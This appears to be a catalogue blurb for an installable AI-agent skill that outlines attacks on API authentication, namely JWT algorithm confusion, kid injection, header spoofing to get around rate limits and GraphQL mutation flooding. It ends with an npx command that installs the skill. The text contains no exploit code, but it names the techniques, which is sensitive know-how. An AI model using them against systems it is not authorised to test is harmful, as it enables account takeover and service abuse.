Focused playbook for breaking API auth through JWT manipulation and header spoofing. Walk through token triage looking at algorithm confusion (alg:none, RS256 to HS256), kid injection, and remote key fetch trust issues, then pivot to mass assignment field hunting and rate limit bypasses using X-Forwarded-For tricks. The quick attack table is handy for initial probes, and the batch abuse section covers GraphQL mutation flooding and bulk enumeration patterns. Routes you cleanly to deeper OAuth and OIDC skills when you hit SSO flows or need full token attack depth. Good first touch when you spot Bearer tokens or API keys and want systematic coverage without overthinking it.
npx skills add https://github.com/yaklang/hack-skills --skill api-auth-and-jwt-abuse